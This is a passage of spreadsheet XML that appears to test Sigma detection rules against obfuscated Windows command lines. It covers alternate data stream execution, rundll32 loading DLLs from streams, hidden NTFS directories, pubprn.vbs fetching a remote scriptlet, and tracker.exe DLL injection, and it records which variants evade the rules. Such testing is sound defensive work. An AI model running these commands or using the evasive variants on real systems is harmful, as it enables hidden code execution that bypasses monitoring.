          <t>Suspicious Extrac32 Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D3998" s="44" t="inlineStr">
        <is>
          <t>4b13db67-0c45-40f1-aba8-66a1a7198a1e</t>
        </is>
      </c>
      <c r="E3998" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c extra^c32.exe C:\Temp\test.cab C:\Temp\test.txt:hidden.txt</t>
        </is>
      </c>
      <c r="F3998" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3998" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution (4b13db67-0c45-40f1-aba8-66a1a7198a1e)</t>
        </is>
      </c>
      <c r="J3998" s="44" t="n"/>
      <c r="K3998" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3999" ht="15.75" customHeight="1" s="42">
      <c r="A3999" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3999" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32_ads</t>
        </is>
      </c>
      <c r="C3999" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D3999" s="44" t="inlineStr">
        <is>
          <t>4b13db67-0c45-40f1-aba8-66a1a7198a1e</t>
        </is>
      </c>
      <c r="E3999" s="44" t="inlineStr">
        <is>
          <t>extrac32.exe C:\Temp\test.cab \\?\C:\Temp\test.txt:hidden.txt</t>
        </is>
      </c>
      <c r="F3999" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3999" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution (aa8e035d-7be4-48d3-a944-102aec04400d); Suspicious Extrac32 Execution (aa8e035d-7be4-48d3-a944-102aec04400d); Suspicious Extrac32 Alternate Data Stream Execution (4b13db67-0c45-40f1-aba8-66a1a7198a1e); Suspicious Extrac32 Alternate Data Stream Execution (4b13db67-0c45-40f1-aba8-66a1a7198a1e)</t>
        </is>
      </c>
      <c r="J3999" s="44" t="n"/>
      <c r="K3999" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4000" ht="15.75" customHeight="1" s="42">
      <c r="A4000" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4000" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C4000" s="44" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D4000" s="44" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E4000" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'; $streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'; Invoke-Expression $streamcommand}"</t>
        </is>
      </c>
      <c r="F4000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4000" s="44" t="n"/>
      <c r="J4000" s="44" t="n"/>
      <c r="K4000" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4001" ht="15.75" customHeight="1" s="42">
      <c r="A4001" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4001" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C4001" s="44" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D4001" s="44" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E4001" s="44" t="inlineStr">
        <is>
          <t>pwsh.exe -c "Add-Content -Path $env:TEMP/NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream streamCommand; $streamcommand = Get-Content -Path $env:TEMP/NTFS_ADS.txt -Stream streamcommand; Invoke-Expression $streamcommand"</t>
        </is>
      </c>
      <c r="F4001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4001" s="44" t="n"/>
      <c r="J4001" s="44" t="n"/>
      <c r="K4001" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4002" ht="15.75" customHeight="1" s="42">
      <c r="A4002" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4002" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C4002" s="44" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D4002" s="44" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E4002" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand "$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'; Invoke-Expression $streamcommand; Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'"</t>
        </is>
      </c>
      <c r="F4002" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4002" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4002" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4002" s="44" t="n"/>
      <c r="K4002" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4003" ht="15.75" customHeight="1" s="42">
      <c r="A4003" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4003" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C4003" s="44" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D4003" s="44" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E4003" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe  "C:\ads\file.txt:ADSDLL.dll",DllMain</t>
        </is>
      </c>
      <c r="F4003" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4003" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4003" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J4003" s="44" t="n"/>
      <c r="K4003" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4004" ht="15.75" customHeight="1" s="42">
      <c r="A4004" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4004" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C4004" s="44" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D4004" s="44" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E4004" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe	"C:\ads\file.txt:ADSDLL.dll",DllMain</t>
        </is>
      </c>
      <c r="F4004" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4004" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4004" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J4004" s="44" t="n"/>
      <c r="K4004" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4005" ht="15.75" customHeight="1" s="42">
      <c r="A4005" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4005" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C4005" s="44" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D4005" s="44" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E4005" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe ".\file.txt:ADSDLL.dll",DllMain</t>
        </is>
      </c>
      <c r="F4005" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4005" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4005" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J4005" s="44" t="n"/>
      <c r="K4005" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4006" ht="15.75" customHeight="1" s="42">
      <c r="A4006" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4006" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_alternate_data_streams</t>
        </is>
      </c>
      <c r="C4006" s="44" t="inlineStr">
        <is>
          <t>Execute From Alternate Data Streams</t>
        </is>
      </c>
      <c r="D4006" s="44" t="inlineStr">
        <is>
          <t>7f43c430-5001-4f8b-aaa9-c3b88f18fa5c</t>
        </is>
      </c>
      <c r="E4006" s="44" t="inlineStr">
        <is>
          <t>regedit.exe /e "C:\Temp\export.reg:out" HKCU\Software\Test</t>
        </is>
      </c>
      <c r="F4006" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4006" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4006" s="44" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J4006" s="44" t="n"/>
      <c r="K4006" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4007" ht="15.75" customHeight="1" s="42">
      <c r="A4007" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4007" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_alternate_data_streams</t>
        </is>
      </c>
      <c r="C4007" s="44" t="inlineStr">
        <is>
          <t>Execute From Alternate Data Streams</t>
        </is>
      </c>
      <c r="D4007" s="44" t="inlineStr">
        <is>
          <t>7f43c430-5001-4f8b-aaa9-c3b88f18fa5c</t>
        </is>
      </c>
      <c r="E4007" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ty^pe C:\Temp\test.txt &gt; C:\Temp\host.dat:ads</t>
        </is>
      </c>
      <c r="F4007" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4007" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4007" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892)</t>
        </is>
      </c>
      <c r="J4007" s="44" t="n"/>
      <c r="K4007" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4008" ht="15.75" customHeight="1" s="42">
      <c r="A4008" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4008" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C4008" s="44" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D4008" s="44" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E4008" s="44" t="inlineStr">
        <is>
          <t>"cmd.exe" /c md %%temp%%\...$.......::$in^dex_al^lo^ca^ti^on &amp; echo too many secrets &gt; %%temp%%\...$.......::$in^dex_al^lo^ca^ti^on\secrets.txt</t>
        </is>
      </c>
      <c r="F4008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4008" s="44" t="n"/>
      <c r="J4008" s="44" t="n"/>
      <c r="K4008" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4009" ht="15.75" customHeight="1" s="42">
      <c r="A4009" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4009" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C4009" s="44" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D4009" s="44" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E4009" s="44" t="inlineStr">
        <is>
          <t>"cmd.exe" /c "set "s1=::$index_" &amp;&amp; set "s2=allocation" &amp;&amp; call md %%temp%%\...$.......%%s1%%%%s2%%"</t>
        </is>
      </c>
      <c r="F4009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4009" s="44" t="n"/>
      <c r="J4009" s="44" t="n"/>
      <c r="K4009" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4010" ht="15.75" customHeight="1" s="42">
      <c r="A4010" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4010" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntfs_short_name_path_use_cli</t>
        </is>
      </c>
      <c r="C4010" s="44" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line</t>
        </is>
      </c>
      <c r="D4010" s="44" t="inlineStr">
        <is>
          <t>349d891d-fef0-4fe4-bc53-eee623a15969</t>
        </is>
      </c>
      <c r="E4010" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\PROGRA~1\\..\PROGRA~1\Internet Explorer\iexplore.exe"</t>
        </is>
      </c>
      <c r="F4010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4010" s="44" t="n"/>
      <c r="J4010" s="44" t="n"/>
      <c r="K4010" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4011" ht="15.75" customHeight="1" s="42">
      <c r="A4011" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4011" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntfs_short_name_path_use_cli</t>
        </is>
      </c>
      <c r="C4011" s="44" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line</t>
        </is>
      </c>
      <c r="D4011" s="44" t="inlineStr">
        <is>
          <t>349d891d-fef0-4fe4-bc53-eee623a15969</t>
        </is>
      </c>
      <c r="E4011" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\PROGRA~1/.\Internet Explorer\iexplore.exe"</t>
        </is>
      </c>
      <c r="F4011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4011" s="44" t="n"/>
      <c r="J4011" s="44" t="n"/>
      <c r="K4011" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4012" ht="15.75" customHeight="1" s="42">
      <c r="A4012" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4012" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntfs_short_name_use_cli</t>
        </is>
      </c>
      <c r="C4012" s="44" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line</t>
        </is>
      </c>
      <c r="D4012" s="44" t="inlineStr">
        <is>
          <t>dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795</t>
        </is>
      </c>
      <c r="E4012" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Temp\RUNME~3.exe"</t>
        </is>
      </c>
      <c r="F4012" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4012" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4012" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4012" s="44" t="n"/>
      <c r="J4012" s="44" t="n"/>
      <c r="K4012" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4013" ht="15.75" customHeight="1" s="42">
      <c r="A4013" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B4013" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntfs_short_name_use_cli</t>
        </is>
      </c>
      <c r="C4013" s="44" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line</t>
        </is>
      </c>
      <c r="D4013" s="44" t="inlineStr">
        <is>
          <t>dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795</t>
        </is>
      </c>
      <c r="E4013" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Temp\RUNME~1.exe."</t>
        </is>
      </c>
      <c r="F4013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4013" s="44" t="n"/>
      <c r="J4013" s="44" t="n"/>
      <c r="K4013" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4014" ht="15.75" customHeight="1" s="42">
      <c r="A4014" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B4014" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C4014" s="44" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D4014" s="44" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E4014" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File Launch-VsDevShell.ps1 -VsWherePath  "C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe"</t>
        </is>
      </c>
      <c r="F4014" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4014" s="44" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution (45d3a03d-f441-458c-8883-df101a3bb146); Launch-VsDevShell.PS1 Proxy Execution (45d3a03d-f441-458c-8883-df101a3bb146)</t>
        </is>
      </c>
      <c r="J4014" s="44" t="n"/>
      <c r="K4014" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4015" ht="15.75" customHeight="1" s="42">
      <c r="A4015" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B4015" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C4015" s="44" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D4015" s="44" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E4015" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost s^cript:[https://example.com/test.sct](https://www.google.com/search?q=https://example.com/test.sct)</t>
        </is>
      </c>
      <c r="F4015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4015" s="44" t="n"/>
      <c r="J4015" s="44" t="n"/>
      <c r="K4015" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4016" ht="15.75" customHeight="1" s="42">
      <c r="A4016" s="44" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B4016" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C4016" s="44" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D4016" s="44" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E4016" s="44" t="inlineStr">
        <is>
          <t>cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\..\en-US\pubprn.vbs localhost "script:[https://example.com/test.sct](https://www.google.com/search?q=https://example.com/test.sct)"</t>
        </is>
      </c>
      <c r="F4016" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4016" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4016" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4016" s="44" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution (1fb76ab8-fa60-4b01-bddd-71e89bf555da); Pubprn.vbs Proxy Execution (1fb76ab8-fa60-4b01-bddd-71e89bf555da)</t>
        </is>
      </c>
      <c r="J4016" s="44" t="n"/>
      <c r="K4016" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4017" ht="15.75" customHeight="1" s="42">
      <c r="A4017" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B4017" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_tracker</t>
        </is>
      </c>
      <c r="C4017" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Injection Or Execution Using Tracker.exe</t>
        </is>
      </c>
      <c r="D4017" s="44" t="inlineStr">
        <is>
          <t>148431ce-4b70-403d-8525-fcc2993f29ea</t>
        </is>
      </c>
      <c r="E4017" s="44" t="inlineStr">
        <is>
          <t>tracker.exe -d test.dll -c cmd.exe</t>
        </is>
      </c>
      <c r="F4017" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4017" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4017" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4017" s="44" t="n"/>
      <c r="J4017" s="44" t="n"/>
      <c r="K4017" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4018" ht="15.75" customHeight="1" s="42">
      <c r="A4018" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B4018" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_tracker</t>
        </is>
      </c>
      <c r="C4018" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Injection Or Execution Using Tracker.exe</t>
        </is>
      </c>
      <c r="D4018" s="44" t="inlineStr">
        <is>
          <t>148431ce-4b70-403d-8525-fcc2993f29ea</t>
        </is>
      </c>
      <c r="E4018" s="44" t="inlineStr">
        <is>
          <t>tracker.exe /d:test.dll /c:cmd.exe</t>
        </is>
      </c>
      <c r="F4018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4018" s="44" t="n"/>
      <c r="J4018" s="44" t="n"/>
      <c r="K4018" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4019" ht="15.75" customHeight="1" s="42">
      <c r="A4019" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B4019" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_tracker</t>
        </is>
      </c>
      <c r="C4019" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Injection Or Execution Using Tracker.exe</t>
        </is>
      </c>
      <c r="D4019" s="44" t="inlineStr">
        <is>
          <t>148431ce-4b70-403d-8525-fcc2993f29ea</t>
        </is>
      </c>
      <c r="E4019" s="44" t="inlineStr">
        <is>
          <t>tracker.exe   /d   test.dll   /c   cmd.exe</t>
        </is>
      </c>
      <c r="F4019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4019" s="44" t="n"/>
      <c r="J4019" s="44" t="n"/>
      <c r="K4019" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4020" ht="15.75" customHeight="1" s="42">
      <c r="A4020" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B4020" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_tracker</t>
        </is>
      </c>
      <c r="C4020" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Injection Or Execution Using Tracker.exe</t>
        </is>
      </c>
      <c r="D4020" s="44" t="inlineStr">
        <is>
          <t>148431ce-4b70-403d-8525-fcc2993f29ea</t>
        </is>
      </c>
      <c r="E4020" s="44" t="inlineStr">
        <is>
          <t>tracker.exe /c cmd.exe /d test.dll</t>
        </is>
      </c>
      <c r="F4020" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4020" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4020" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4020" s="44" t="n"/>
      <c r="J4020" s="44" t="n"/>
      <c r="K4020" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4021" ht="15.75" customHeight="1" s="42">
      <c r="A4021" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B4021" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_tracker</t>
        </is>
      </c>
      <c r="C4021" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Injection Or Execution Using Tracker.exe</t>
        </is>
      </c>
      <c r="D4021" s="44" t="inlineStr">
        <is>
          <t>148431ce-4b70-403d-8525-fcc2993f29ea</t>
        </is>
      </c>
      <c r="E4021" s="44" t="inlineStr">
        <is>
          <t>tracker.exe "/d" test.dll "/c" cmd.exe</t>
        </is>
      </c>
      <c r="F4021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4021" s="44" t="n"/>
      <c r="J4021" s="44" t="n"/>
      <c r="K4021" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4022" ht="15.75" customHeight="1" s="42">
      <c r="A4022" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4022" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_utilityfunctions</t>
        </is>
      </c>
      <c r="C4022" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll</t>
        </is>
      </c>
      <c r="D4022" s="44" t="inlineStr">
        <is>
          <t>0403d67d-6227-4ea8-8145-4e72db7da120</t>
        </is>
      </c>
      <c r="E4022" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File "C:\Windows\diagnostics\system\WindowsUpdate\UtilityFunctions.ps1" -Command "&amp; {RegSnapin; [void](Get-SnapinProxy -DllPath c:\test\myproxy.dll)}"</t>
        </is>
      </c>
      <c r="F4022" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4022" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4022" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4022" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120)</t>
        </is>
      </c>
      <c r="J4022" s="44" t="n"/>
      <c r="K4022" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4023" ht="15.75" customHeight="1" s="42">
      <c r="A4023" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4023" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_utilityfunctions</t>
        </is>
      </c>
      <c r="C4023" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll</t>
        </is>
      </c>
      <c r="D4023" s="44" t="inlineStr">
        <is>
